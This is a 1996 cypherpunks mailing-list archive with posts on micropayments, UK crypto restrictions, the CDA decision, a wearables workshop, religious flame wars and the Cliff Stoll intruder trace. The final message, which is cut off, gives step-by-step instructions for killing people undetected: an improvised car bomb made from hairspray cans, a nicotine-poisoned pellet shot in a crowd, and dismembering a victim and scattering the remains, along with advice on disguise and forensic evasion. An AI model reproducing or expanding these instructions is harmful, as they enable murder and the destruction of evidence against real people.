-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMb4A5xguzHDTdpL5AQGxLQP/YXH9uWmXC2xK/Pr/c4kdyopE213bsQpL
+T3RD2qSK+qO234fHL3nJmQVBTS5Eyyw4YtMEmnV87vclpWbP9WIr+7RDvYpr/aM
1/6QBEux3f/K6SaPD5iBHfuoc8XkriqhfXgiiUnVK4IxbhHaLatPpSeKLQmX0o2Q
3fVXFjWuEGs=
=sSf7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 12 Jun 1996 15:25:27 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [more noise] Re: [NOISE] I swear I am not making this up.
In-Reply-To: <Pine.3.89.9606110239.A21446-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SV4.3.91.960611174445.20391G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 11 Jun 1996 s1113645@tesla.cc.uottawa.ca wrote:

> ObCryptolinguisticsPunks: Did anyone know Iranian and Aryan are synonyms?

   I think there is NOT a one-to-one mapping of Iranian to Aryan. 
specifically, Farsi'im might be descended from the Aryans, but so are some 
others. Northern Indians, I think?

I have another problem with your statement.  Islam was a gigantic 
watershed in the sociocultural history of Persia. Islamic currents are 
stronger in contemporary Iranian culture, than ancient Aryan influences. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 12 Jun 1996 13:19:49 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Slander of Catholic Church
Message-ID: <199606111758.KAA04717@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Moroni <moroni@scranton.com>
              Cypherpunks <cypherpunks@toad.com>
              Tim May <tcmay@got.net>
              Paul Penrod <furballs@netcom.com>

 
On Tue, 11 Jun 1996, Paul Penrod <furballs@netcom.com> wrote:
= On Mon, 10 Jun 1996, Timothy C. May <tcmay@got.net> wrote:

	<snip>...
=> 
=> --Cardinal Timothy May
=> 
=> (Who believes all cults and religions are basically the same shuck and
=> jive, and who thinks the "Church of Scientology" is actually a little bit
=> less foolish that the Church of Mormon, with its "baptism of dead
=                       ^^^^^^^^^^^^^^^^
= It's The Church of Jesus Christ of Latter Day Saints.
=
= If your going to criticize it, at least get the name right.
=
= > ancestors" into the Church,

	the concept is easy once you consider the sanctity of eternal "life" 
    and the relation of the spirit.  the principle is in the gospels of the 
    disciples in numerous places.

= the funny underwear people have to secretly
= ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
= Do you wear yours on the outside like Madonna?
=
= > wear, etc. However, I have great respect for the practical tactics of 
= > the Mormons, and no respect for the day to day behavior of the CoS.)
= >
= >
	actually, I am curious as to when Tim wore his set of "funny 
    underwear"   sounds like a good topic for the Cypherpunk Enquirer! 

=
= Frankly, I think this discussion needs to be put back into 
= alt.flame.the.religion.of.your.choice. It's bad enough to watch a 
= discussion on anonymous transactions devolve into useless drivel on whale 
= ownership and the questionable philisophical ruminations of a Piled 
= Higher and Deeper, without flinging this prarrie muffin on the pile too.
=
= ....Paul

** Reply to note from Moroni <moroni@scranton.com> 06/11/96 

= Tim ,
=           You should stick to your own religion and not criticize other 
= peoples. It is unforunate that the esteem that I once felt for you is 
= dwindling because of your anti-Mormon trash. Perhaps you do not realise 
= that some people take more than an academic interest in their religion 
= ;this is unforunate . It is pitiful. You are becoming the ugly 
= American that foreigners hate; always having an opinion about everything.
=                                moroni


	too strong, moroni  --remember _our_ values; not those of a critic.  
    last night in FHE I covered the first mob in Jackson County where Bushop 
    Partridge turned the other cheek to make it easier after the first was 
    tarred by the mob.




--
The result of today's 'government' 
  is new world disorder, unfolding at warp velocity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 12 Jun 1996 12:38:51 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A guide to self control (Was funny underwear)
Message-ID: <199606111759.KAA05005@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from nobody@REPLAY.COM 06/11/96 09:58am +0200

= To: Cypherpunks@toad.com
= From: nobody@REPLAY.COM (Anonymous)
= 
=   A Guide to Self-Control
=  
=   Subject: Steps in Overcoming Masterbation
=  
=  Excerpt from a Mormon missionary guide, circa 1970: Steps in
=  Overcoming Masterbation, Mark E. Petersen
= 
=    1. Never touch the intimate parts of your body except during normal
=        toilet processes.
=
	you forgot to add the dictum on how long you are allowed to wash it 
    in the shower...

--
  "Privacy Through Cryptography."
  "Communicate Globally, Censor Locally."

    I think an old Doonesbury cartoon that had Duke (representing
    the NRA) testifying before a Senate subcommittee summed it up
    quite nicely.....

    Senator: "And we and the American people have had enough of you and
      your fanatic organization!"

    Duke: "I see Senator, shall I put you down for a million postcards?"

    Senator: "Don't you threaten me mister!"

    Politicians only understand one thing.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 12 Jun 1996 17:32:58 +0800
To: Stephan Vladimir Bugaj <stephan@studioarchetype.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f04ade3579bc415@[204.162.75.169]>
Message-ID: <Pine.SUN.3.91.960611181936.27362E-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've had this argument lots of times, and I tend to flip-flop between 
several positions, but I think you're missing the big big win of 
micropayments(*). Micropayments allow an individual to charge for 
information which is of value to the reader, but the magnitude of which 
is too small to handle by conventional means; for example, a single 
article or comic strip in a newspaper is too cheap to perform a complete 
SET/{VISA,MC,NOVUS) transaction for. The journalist cannot sell the work 
direct- instead she must sell the work through a middleman who takes by 
far the biggest cut. 

 Micropayments allow each author to be her own wire-service. _This_ will 
be the triggering point for the new media. These services can be combined 
into edited newspapers without the editors needing to set up complex 
traditional arrangements (I'd pay for John Young's Daily News :)

Freedom of the Press belongs to those who own the vending machines

Simon


(*) For the purpose of this message, micropayments are defined to be low 
value transactions below the minimum values acceptable for conventional 
payment networks



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 12 Jun 1996 15:58:50 +0800
To: cypherpunks@toad.com
Subject: Re: Britain to control crypto - official (fwd from Usenet)
In-Reply-To: <199606112007.QAA01167@nrk.com>
Message-ID: <v03006f0cade3a501bcb5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


> The British government quietly announced yesterday that it will
> legislate to restrict crypto.

Does anyone here have any idea what this does to british-affiliated states
like Anguilla, or the Caymans?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 12 Jun 1996 12:30:39 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <Pine.LNX.3.93.960610191530.922E-100000@smoke.suba.com>
Message-ID: <31BDA18F.2C67412E@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> 
> On Wed, 5 Jun 1996, John Young wrote:
> 
> > Today's USA has a pair of front page stories:
> > "Feds ready anti-terror cyberteam" and "Terrorism on the Net -- Post-Cold
> > War hysteria or a national threat?"
> > They lay out the nightmares and the valiant TLA-daydreams to out-fund the
> > hackers and out-flummox the public.
> > "You bring me a select group of hackers and within 90 days I'll bring this
> > country to its knees, " says Jim Settle, retired director of the FBI's
> > computer crime squad.
> 
>         Give me 15 well trained soldiers(near special forces level) and I
> can do it in less than 60 days. Without touching a computer.

Give me 10 well trained biological warfare scientists and I'll do it
in 30 ...

Any more bids?  :-)

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Wed, 12 Jun 1996 11:50:02 +0800
To: cypherpunks@toad.com
Subject: Micropayments are Crap
In-Reply-To: <199606060257.TAA16018@netcom.netcom.com>
Message-ID: <19960611184817.21676.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Vladimir Bugaj writes:

 > Setting a micropayment enabled web browser to automatically grant approval to
 > payments of $.02/action may seem reasonable, but it depends on what the vendor
 > has decided constitues an action.  If somone charged $.02/nanosecond for
 > retreiving shareware from an FTP library, and my browser was set to accept this
 > as reasonable based on the fact that it was $.02/action,

You could also set a per-site limit, or a per-minute limit.

 > It took the industry long enough to get PCs and workstations to the
 > speeds they're at today so people could do their own work on their
 > own machines to go back to waiting in a queue for time on a
 > centralized system so you can have the honor of paying someone a
 > lot of money to run your job.  As a programmer, I can see how I
 > could make a fat chunk of change by bilking people through metered
 > software usage, but as a software consumer it seems like a rotten
 > idea.

Oh?  Would you rather pay $5,000 for some vertical piece of software,
or license its use on a $1/hour basis?  Even if you used it every hour
of every workday, that's only $2,000.

 > Looking at micropayments from the (economically) conservative element
 > viewpoint within certain industries make them seem a lot less appealing, as
 > well.  Take television.  If people had to purchase every TV show they
 > watched, there would be a lot less TV production going on because there
 > wouldn't be as much random TV watching.

Um, you *do* purchase every TV show.  On the fly.  30 seconds at a
time.  Of course, some cheap people try to welsh [ see my hostname
before taking offense ] on their payments by Going To The Bathroom
during their payment periods!  Disgraceful, just disgraceful.

 > Both micropayments and data mining require that the user give the vendor a
 > level of trust which most vendors are not willing to repay with similar
 > trust and customer satisfaction.  Customer-users are expected to give
 > vendors greater access to and control over their money and personal
 > information, yet at best they can expect the same poor customer service and
 > bureaucratic attitudes encountered when dealing with traditional
 > transaction processing companies and at worst can expect to be swindled out
 > of piles of money and/or have their
 > privacy violated as a matter of course.

Hmmm...  Sounds like a job for ...  Super-Shameer!  Profit-making
super hacker privacy protector!  His mail flies through remailers with
the greatest of ease, he's invincible to flames, and and he is cute,
too!

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 12 Jun 1996 16:37:04 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Anonymous return addresses
In-Reply-To: <Pine.SV4.3.91.960611172935.20391B-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.93.960611202255.188B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 11 Jun 1996, Alan Horowitz wrote:

> Can anyone "give away the Ending" of Cliff Stoll's book - and describe 
> the basic methodology used to track back to the German hacker?
> 
> I don't have time to read the book. I don't need to understand all the 
> little nuanced details, I just want to know the "trick".

Here's the story as best as I can remember from _Cyberpunk_:

Cliff Stoll worked at LBL where he found that the account of a former worker
was being abused by a cracker.  He set up a system that would log every
keystroke the cracker made and he would automatically get paged whenever there
was an intrusion.  The connection was apparently from a Tymnet node.  Stoll got
a search warrent and traced the Tymnet connection back to a modem pool at
Mitre in Virginia.  The people at Mitre found that the cracker was dialing into
the modem pool and exploiting a security hole to dial back out to a Tymnet
node.  With cooperation from the CIA, it was found that the calls were being
made from a network in Germany called Datex-P.  When the network discovered the
extremely high long-distance bills, they traced the call back to Pengo (Hans
Huebner).

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMb4P3rZc+sv5siulAQE7UAP/QoDxTapE1GjxXdWBD7mXIv+p4aeo2s8Z
7MZV65Faqpa/iEUEO539TkTToDr8yIUC1Mdkx3QDaJ0k5Wfw8qT2956n6kGS6CkS
hi2CgrOIlzsdBBbvdhxMHoRlA7O15uc4nQ3ghJU/FjjdpOFsQh/pwLRcdrG78L3n
X33Gi7YUdxc=
=2NkX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 12 Jun 1996 18:23:56 +0800
To: "'cypherpunks@toad.com>
Subject: [MISC]  Speaking of Wearables
Message-ID: <01BB57DC.B7852AC0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Thought this might be of interest to some.....

---------- Forwarded message ----------
Date: Mon, 10 Jun 1996 16:26:29 -0700 (PDT)
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Wearable computing conference August 19-21st

[The world is so wonderfully strange.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 10 Jun 1996 18:50:09 -0400
From: Thad E Starner <testarne@tottenhamcourt.media.mit.edu>
Subject: Wearable computing conference August 19-21st

[...]

		 Announcement/Call for Participation
		Workshop on Wearable Computer Systems

Over the past few years, a new technology has been rapidly taking
shape.  It is the technology of wearable computer systems --
battery-operated computer systems worn on the user's body on a belt,
backpack or vest, designed for mobile and predominantly hands-free
operation, often incorporating head-mounted displays and speech input.
Such systems are now being prototyped and investigated in the context
of a wide variety of military, educational and industrial
applications, including maintenance, training, and manufacturing.

On August 19-21, Boeing will host an informal workshop on wearable
computer technology, at the Boeing Customer Services Training Center
in Renton, WA, a few miles east of Seattle-Tacoma International
Airport.  Our intent is to bring together vendors and potential
vendors of these systems, researchers studying this technolgy, and key
application customers for an open discussion of the future of wearable
computer systems technology.  The workshop's technical focus will be
on the platforms, peripherals, software systems and applications
associated with wearable computers.  The format of the meeting will be
as follows:

o There will be several research presentations.  Leading university,
industrial, and government labs will discuss the research they are
doing concerning the design and use of future wearable systems.

o Booth space will be available for vendors to display and demonstrate
their current products. 

o Selected government and industrial developers will describe the
wearable computer applications they are planning or implementing,
and the technical requirements implied by these applications.

o Later in the meeting, participants will separate into breakout
discussion groups of their choice to focus on issues of particular
interest to them.  Each breakout group will present a summary of their
discussion and their recommendations to the main body of the
workshop particpants.  Breakout discussion topics may include

	- what standards need to be established?

	- what are the operating system and user interface software
	  requirements for wearable computers?

	- what basic and applied research should the government fund
	  in this area?

A more detailed list of possible breakout discussion topics is
included on the workshop registration form.  Registrants are requested
to select which topics they believe would be most worthwhile to
address at the meeting.

How to Apply to Participate

Because of space limitations and the informal nature of this workshop,
attendance will be limited to 150. Persons or groups wishing to attend
should submit either a booth request or a research or application
position paper, as described below.  Academic, government, industrial
or vendor researchers and government, industrial or vendor application
developers are invited to submit position papers.  As time permits,
attendees will be asked to give brief talks about their research or
development activities, based on their position papers.  There may not
be time for all attendees to speak to the group.  In that case, the
organizing committee will try to select a representative mix of
research and application talks from among the position papers.

Position papers and booth requests may be submitted by mail to

	Ms. Diane Rush
	Research and Technology
	Boeing Information and Support Services
	P.O. Box 3707, Mail Stop 7L-40
	Seattle, WA 98124-2207

or by fax to 206-865-2965, 

or by Internet mail to diane.rush@iss-rt.boeing.com

We strongly prefer submission via e-mail (ASCII text). 

For related questions, Diane can be reached by phone at 206-865-3211.

Due Dates

Booth space requests and workshop position papers are due by June 19.
The committee's selections will be announced by July 12.

Research Papers

People engaged in research projects on wearable computer systems are
invited to submit a two-page position paper, describing 

	- the problems their research project is addressing
	- results they have achieved 
	- the potential implications of their research on the
	  future of this technology.

Application Papers

People conducting or commencing applications of wearable computers to
military, industrial, medical or other domains are invited to submit
two-page position papers describing their project, including

	- the application they are focused on
	- technical issues/problems they are encountering
	- requirements this application is placing on wearable
	  computer technology.

Vendor/Demo Booths

Booth space in and near the workshop auditorium is limited.  Displays
should be designed to fit within an 8' by 6' area.  Each display will
have access to electrical outlets and will be provided, if they
desire, with a 5' by 2' table.  Booth requests will be filled on
a first-come, first-served basis.

Accomodations

There are several hotels in Renton near the Boeing Customer Services
Training building.  Boeing buses will transport workshop attendees to
and from the meeting at the beginning and end of each workshop day.
The list of recommended hotels will be sent to attendees along with
their selection notification.  These hotels are reserving blocks of
rooms for workshop attendees until July 18.

Further Information About the Workshop

Up-to-date workshop information will be maintained on the World-Wide
Web, at the following address:
 
  http://wearables.www.media.mit.edu/projects/wearables/workshop/

Workshop Organizing Committee

David Mizell
Boeing Information and Support Services

Thomas Caudell
University of New Mexico

Zary Segall
University of Oregon

Dan Siewiorek
Carnegie Mellon University

Thad Starner
Massachusetts Institute of Technology








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 12 Jun 1996 17:59:52 +0800
To: cypherpunks@toad.com
Subject: "Neil, the government wouldn't tap the phones of American Reporters"
Message-ID: <199606120414.VAA02424@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"Neil, the government wouldn't tap the phones of American Reporters"
- Hedrick Smith to his NYT colleague Neil Sheehan, while working
on the Pentagon Papers project - he was incorrect, and his phones
_were_ being tapped....

CSPAN-2 is doing a 25-year retrospective on the Pentagon Papers this week;
Daniel Ellsberg, Hedrick Smith, and others were on tonight,
with people from other sides on later this week.  Cool show so far!

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 12 Jun 1996 17:56:18 +0800
To: wb8foz@nrk.com
Subject: Re: Britain to control crypto - official (fwd from Usenet)
In-Reply-To: <199606112007.QAA01167@nrk.com>
Message-ID: <v03007300ade3fff0f555@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>The British government quietly announced yesterday that it will
>legislate to restrict crypto. The details are in the attached
>Reuters and PA newswires.
>
[snip]
>    "The TTPs would offer digital signature, data integrity and retrieval, key
>management and other services for which there is a commercial demand," Taylor
>said in a written parliamentary answer.
>
It's been said before, but I'll say it again.
I have no objection with this.

If people wish to safeguard their encryption/signature keys by leaving them with a "trusted third party", then they should be able to do so.

If this is a requirement, then it's hardly a service for which there is a "commercial demand".

I assume that followup news releases (or the aforementioned workshop) will clarify the situation.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We don't have to take it; never have, never will.
Gonna shake it, gonna break it; let's forget it: better still" --The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 12 Jun 1996 17:49:32 +0800
To: cypherpunks@toad.com
Subject: Re: Venture capital financing/partnering for unique website ideas/entrepreneurs
Message-ID: <199606120522.WAA18166@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:19 PM 6/11/96 -0400, Ventureweb@aol.com wrote:
> Re:	Venture Capital Funding/Venture Partnering For
> 	Web Site Developers/Entrepreneurs
>
> Hello;
>
> 	My firm, DataMerge, Inc.  is currently developing a program to
>provide financial backing and strategic assistance for commercially
>viable website development. It is my job to locate individuals with ideas
>and/or plans for creating high profile,  niche market websites that, with
>our assistance,  can be profitably brought to maket.


Hmmmm...   "High profile"?  Check.   "niche market"?  Check.  "profitable"?  Check...



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 12 Jun 1996 18:39:48 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Britain to control crypto - official (fwd from Usenet)
In-Reply-To: <199606112007.QAA01167@nrk.com>
Message-ID: <Pine.SUN.3.91.960611223647.28381C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jun 1996, David Lesher wrote:

> 
> Fuller details will no doubt be available at a one day workshop
> that the Ministry of Defence is organising at the IEE in Savoy
> Place on the 27th June. The speakers will include directors of
> both CESG (GCHQ's front operation) and DRA, as well as a policeman
> and the data protection registrar. The IEE's phone number is 0171
> 240 1871.

I'm going to be in London on the 27th- any other Cypherpunks ready to 
make a show of it?  

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 12 Jun 1996 17:06:49 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: CDA decision TOMORROW 9 am! (fwd)
Message-ID: <199606120259.WAA02510@nrk.com>
MIME-Version: 1.0
Content-Type: text



The CDA deathwatch is almost over.

The Philadelphia court will announce its decision tomorrow, 6/12, at 9 AM 
EST, according to a fax from the court.

Check the usual web sites for more info and breaking news on the decision:

http://fight-censorship.dementia.org/top/
http://www.eff.org/
http://www.vtw.org/
http://www.aclu.org/
http://www.epic.org/
http://www.cdt.org/

The ACLU is holding a press conference in NYC at 11 am. The ALA/CIEC 
plaintiffs will be holding a press conference in Washington, DC at 12 noon.

For the latest information, subscribe to the fight-censorship-announce
mailing list by sending "subscribe fight-censorship-announce" to
majordomo@vorlon.mit.edu. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 12 Jun 1996 19:17:11 +0800
To: cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
Message-ID: <199606120647.XAA03328@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 6/11/96 -0700, Timothy C. May wrote:
> the "net.war" declared by some on
> the Church of Scientology is little different than having a similar war
> against Catholics, Rosicrucians, Parsees, whatever.


There is a very great difference:  Scientology made war on the net.

The Catholics, Rosicrucians, whatever, have not.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 12 Jun 1996 17:47:16 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous return addresses
In-Reply-To: <Pine.SV4.3.91.960611172935.20391B-100000@larry.infi.net>
Message-ID: <9606120354.AA16387@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> Can anyone "give away the Ending" of Cliff Stoll's book - and describe 
> the basic methodology used to track back to the German hacker?

	Can't remember the exact details (and I can't remember where
my copy is :), but basically they used the ACK/NAK times in the kermit
protocol to guess his distance.  After tracing him back to some firm
in Va, they worked out to Germany and then the Bundespost ran a phone
trace to find him.  (So all y'all malicious crackers that have the
TLAs trembling in their jackboots remember to tweak your kermit (or
rz) progs to randomize response times. :)

	I'd reccommend reading the book.  It's pretty interesting.  Or
Nova did an episode ~2 years back (whenever the book came out) that
was a quick 1hr version of the whole story.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 12 Jun 1996 20:16:52 +0800
To: cypherpunks@toad.com
Subject: HotWired article on NEW bill to let FCC set net-stds, repeal CDA
Message-ID: <YljXz4O00YUy0ZwEoj@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I spoke with Rep. Lofgren for a while today while I was writing this
piece. I believe she's genuinely well-intentioned, but doesn't
understand the issues. 

Visit HotWired's web site for the full report.

-Declan

---

http://www.hotwired.com/netizen/96/24/index2a.html

   The Hydra
   HotWired Special Report
   by Brock N. Meeks and Declan McCullagh
   Washington, DC, 11 June 
   
   A bill that would attempt to "fix" the potential harm of the
   Communications Decency Act was dropped into the legislative boneyard
   late yesterday by freshman Representative Zoe Lofgren (D-California).
   The bill, dubbed the "Internet Freedom and Child Protection Act,"
   provides neither.
   
   [...]

   Then there are her loopy additions. All Internet service providers,
   under government mandate, will become vendors of "blocking software"
   such as SurfWatch or Cyber Patrol. Lofgren's bill says that all new
   ISP customers must be provided, either free or at a fee, "screening
   software that is designed to permit the customer to limit access to
   material that is unsuitable for children." Of course, nowhere does she
   define what "unsuitable" means.

   However, such vagueness didn't stop Lofgren from proposing that the
   Federal Communications Commission move into the business of setting
   commercial software standards. Under this bill, the FCC is required to
   "prescribe minimum technical standards for screening software."

   [...]

   How does the FCC feel about a new proposed role as "software
   commissioner?" Frankly, they'd rather not be involved, according
   to Mark Corbitt, technology policy advisor to Chairman Reed Hundt.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 12 Jun 1996 19:21:49 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: <NOISE>
In-Reply-To: <gaVcPD5w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.960612000115.295A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jun 1996, Dr.Dimitri Vulis KOTM wrote:

> snow <snow@smoke.suba.com> writes:
> ...
> > 	It is almost ridicoulously simple to kill someone in a relatively
> > untraceable fashion. Any person of average intelligence can do a little
> > research (say about 3 hours at a decent (non-chicago) library) and spend
> > an hour or two in thought and come up with a way to target a non- to
> > moderately public figure with out getting caught.
> > 	I can give you 4 right off the top of my head that have a
> > reasonable chance of sucess, and very little chance of discovery.
> 
> Please do - thank you.
> 
> With purely academic interest,

	These methods assume a reasonable amount of stealth and
intelligence on the part of the murder, meaning things like choosing the
appropriate time of day to carry out the attack. Also notice that some of
these methods cause more "collateral" damage than others. These are also
not particluarly suited to a highly placed political victim. Those (as
noted) take more work.

	Remember AT ALL TIMES That you MUST be worried about forensic
evidence. Hair, skin, finger prints, blood etc. TAKE PRECAUTIONS. 

	Also note that I have never tried any of these, nor has anyone I
know--at least to my knowlege. They seem like they would work, but are
not, of course, guarenteed to work. 

	Some generic advise that generally applies in all circumstances:
	1) Get scruffy before hand if possible. Don't shave or wash/comb
your hair or bush your teeth. Wear _decent_ clothes aquired from a second
hand store in colors you don't normally wear (don't deliberately clash,
it is too obvious). If you normally wear shoes, wear boots and vice versa.
Of course dispose of the clothing as soon as possible after the event, and
clean yourself up to whatever is normal for you. Don't bother growning a
beard, it takes too long, and it's sudden appearance and removal could be
questioned. 
	
	1) Wire/tape 6 to 8 large cans of hair spray around the tail pipe
ofvictims car. This assumes 3 things-- 1) Victim drives, 2) You have access
to Victims car (best time is around 4 or 5 in the morning) 3) You are sure
that the victim will be in the car. Most hairspray is at least somewhat
flamable, and when heated by a tail pipe will go off like a bomb.
Thourghly clean the cans before hand to remove any possible remaining
prints and/or other forensic evidence.
	This works best in a suburb or a rural area where a) people are
less likely to be out and about at night, and b) are more likely to own
and regularly use an automobile. 

	2) Aquire a .22 caliber air pistol, clean thoroughly. Get a cigar
and boil it down to get a small amount of "pure" nicoteen. This is a
decently potent poison. Pack a portion of this into the cup end of a
pellet. Wear latex gloves On a busy street approach your victim from
behind as he/she is walking. Shoot him/her (expose the pellet gun as
little as possible. Keep walking steadily. Randomly turn corners, dropping
the gun in the trash at the first opportunity. Gloves a couple of blocks
later. 
	This would work best in a LARGE city. I don't know if you can get
a guarenteed lethal dose of nicoteen into that cup, but you could
substitute a more lethal poison at a risk of more tracability.
	This assumes that there are no cops in the immediate area. It
works on the idea that the small sound of a pellet gun going off will be
lost in the general traffic noise, and that people will be more attentive
to the victim than to random people.

	3) This one is definately NOT for the squemish, or the weak. If
the victim lives alone, or is likely to be alone at home for a length of
time, enter the home. Kill the victim using some sort of poison or other
bloodless method (strangulation, breaking the neck etc)  Carry the body to
the bathroom and drain as much blood from the body as possible. This may
take a while, so use the time to strip as much flesh from the bones as
possible, being careful NOT to mess up the place any more than necessary,
as you will have to clean it. 
	If the victim has a garbage disposal, run as much of the flesh
down it as possible. When as much blood and flesh has been disoposed of as
possible, put the rest in small trash bags. Wash _everything_ as much as
possible. Put these trash bags into a second set of trash bags. Put these
trash bags into used military duffel bags purchased (one at a time) at
different military surplus stores. If you have been able to get most of
the flesh off, it would take much, and with most of the blood gone, the
weight will be gone, so you should be able to carry the rest of the body
off. Deposit the different body parts around the city/state in random
dumpsters etc. The wider you spread the parts the better.

	4) Turn your victim into the BAFT as the leader of an "End time"
